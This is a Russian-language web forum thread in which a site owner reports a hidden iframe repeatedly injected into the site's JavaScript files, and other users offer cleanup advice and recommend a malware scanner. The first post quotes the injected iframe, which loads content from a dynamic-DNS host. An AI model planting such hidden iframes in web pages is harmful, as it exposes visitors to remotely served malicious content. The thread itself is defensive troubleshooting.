Jump to content
Sign in to follow this  
svan

Вредоносное ПО на сайте

Recommended Posts

Три дня назад по бану на Google обнаружил вирус на сайте. Вот такая дрянь подставляется во все файлы из папки javascript:

<iframe width="55" height="55" style="width:100px;высота:100px;position:absolute;слева:-100px;top:0;" src="http://rxrla.ddns.name/46b2e4f7ff73218ac85.res?11"></iframe>

И url постоянно меняется. Чего только не пробовал и сайт переустанавливал из бекап и из "коробки" результат один - как только сайт начинает работать этот долбаный код опять появляется в файлах js. Базу данных очищал полностью, пароли менял, комп антивирусом проверял.

Откуда он лезет?

Вот сканер http://sitecheck.sucuri.net/scanner/ показывает, как только все файлы в javascript меняешь - все чисто, несколько кликов на сайте - опять вирусняк показывает.

Версия ОС 1.5.3.1

Share this post


Link to post
Share on other sites

444 на файл

пароль на фтп меняли?

на домене есть phpmyadmin, какая версия, какой там метод авторизации?

Share this post


Link to post
Share on other sites

AI-Болит v.20121221 — удаленькая искалка вредоносного ПО на хостинге.

Всем доброго времени!

В продолжение и по причине того,что сам зачастую сталкиваюсь (думаю,что и многие из вас,сами того не подозревая..исключая понятно господ "в теме")

с вредоносными и хакерскими скриптами,которые,как правило "вшиты" не только во фришные..но и к сожалению и в платные расширения и модули,шаблоны..огворюсь,совершенно не обязательно приобретенными непосредственно здесь (!) тем не менее,более чем комфортно чувствующими себя и работающими "на хозяина" на вашем же хосте,рекомендую воспользоваться (!! речи не может быть о рекламе) - AI-Bolit - это уникальный бесплатный скрипт для поиска вирусов, троянов, backdoor, хакерских активностей на хостинге.http://www.revisium.com/ai/

Share this post


Link to post
Share on other sites
444 на файл пароль на фтп меняли? на домене есть phpmyadmin, какая версия, какой там метод авторизации?
Вообще на какие файлы надо оставлять право на запись - по идее это выход.

Через базы вообще возможно заражение сайта? Если да, то что там искать?

Share this post


Link to post
Share on other sites

сначала разберитесь с шаблоном. Откуда взяли, что как и почему. А то сколько прав не выставляй, а функционал вируса будет сидеть в шаблоне или движке.

Share this post


Link to post
Share on other sites

Кстати, мне вот тоже интересно, может ли такой код в шаблонах, изменить потом и другие файлы на сайте?

Или будет работать, только на вне?

Share this post


Link to post
Share on other sites

Помогите! В админку влез,не знаю что,точнее в модули,реклама,два модуля подсвечивает синим,нажимаешь,выходит реклама тотализатора. Как это все можно убрать.Сканировал все на вирусы,пишет вирусов нет....,я в замешательстве...

Share this post


Link to post
Share on other sites

Помогите! В админку влез,не знаю что,точнее в модули,реклама,два модуля подсвечивает синим,нажимаешь,выходит реклама тотализатора. Как это все можно убрать.Сканировал все на вирусы,пишет вирусов нет....,я в замешательстве...

Что можно сказать, меняй хостера, меняй пароли...

Заменяй все что можно заменить чистым кодом или сравнивай изменения

Чисти свой ПК

Share this post


Link to post
Share on other sites

Подскажите как избавится от этого

:-D Вопрос, это только в админке или везде?

Share this post


Link to post
Share on other sites

Nik159, руками, видимо. прямыми.

и, как всегда, - чистим комп, меняем пароли...

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
You are posting as a guest. If you have an account, please sign in.
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

  • Recently Browsing   0 members

    No registered users viewing this page.

×

Important Information

On our site, cookies are used and personal data is processed to improve the user interface. To find out what and what personal data we are processing, please go to the link. If you click "I agree," it means that you understand and accept all the conditions specified in this Privacy Notice.